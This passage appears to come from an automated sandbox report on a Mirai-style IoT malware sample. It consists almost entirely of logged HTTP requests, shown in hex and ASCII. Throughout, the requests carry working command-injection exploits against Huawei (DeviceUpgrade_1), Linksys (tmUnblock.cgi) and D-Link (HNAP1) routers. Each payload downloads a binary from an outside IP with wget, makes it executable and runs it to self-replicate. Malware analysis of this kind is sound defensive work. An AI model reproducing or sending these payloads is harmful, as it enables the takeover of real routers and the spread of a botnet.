6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 212.192.216.45 -l /tmp/binary -r /bins/mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope> |
| Source: global traffic | HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 31 32 2e 31 39 32 2e 32 31 36 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 62 69 6e 73 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 212.192.216.45 -l /tmp/binary -r /bins/mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope> |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://212.192.216.45/bins/mpsl;chmod 777 *;./mpsl selfrep.asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /HNAP1/ HTTP/1.0Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://212.192.216.45/bins/mips && chmod +x mips;./mips selfrep.hnap`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope> |
| Source: global traffic | HTTP traffic detected: POST /HNAP1/ HTTP/1.0Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://212.192.216.45/bins/mips && chmod +x mips;./mips selfrep.hnap`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope> |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://212.192.216.45/bins/mpsl;chmod 777 *;./mpsl selfrep.asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://212.192.216.45/bins/mpsl;chmod 777 *;./mpsl selfrep.asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://212.192.216.45/bins/mpsl;chmod 777 *;./mpsl selfrep.asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 31 32 2e 31 39 32 2e 32 31 36 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 62 69 6e 73 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 212.192.216.45 -l /tmp/binary -r /bins/mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope> |
| Source: global traffic | HTTP traffic detected: POST /HNAP1/ HTTP/1.0Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://212.192.216.45/bins/mips && chmod +x mips;./mips selfrep.hnap`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope> |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://212.192.216.45/bins/mpsl;chmod 777 *;./mpsl selfrep.asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://212.192.216.45/bins/mpsl;chmod 777 *;./mpsl selfrep.asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://212.192.216.45/bins/mpsl;chmod 777 *;./mpsl selfrep.asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://212.192.216.45/bins/mpsl;chmod 777 *;./mpsl selfrep.asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://212.192.216.45/bins/mpsl;chmod 777 *;./mpsl selfrep.asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://212.192.216.45/bins/mpsl;chmod 777 *;./mpsl selfrep.asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 31 32 2e 31 39 32 2e 32 31 36 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 62 69 6e 73 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 212.192.216.45 -l /tmp/binary -r /bins/mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope> |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://212.192.216.45/bins/mpsl;chmod 777 *;./mpsl selfrep.asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://212.192.216.45/bins/mpsl;chmod 777 *;./mpsl selfrep.asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 31 32 2e 31 39 32 2e 32 31 36 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 62 69 6e 73 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 212.192.216.45 -l /tmp/binary -r /bins/mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope> |
| Source: global traffic | HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 31 32 2e 31 39 32 2e 32 31 36 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 62 69 6e 73 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade 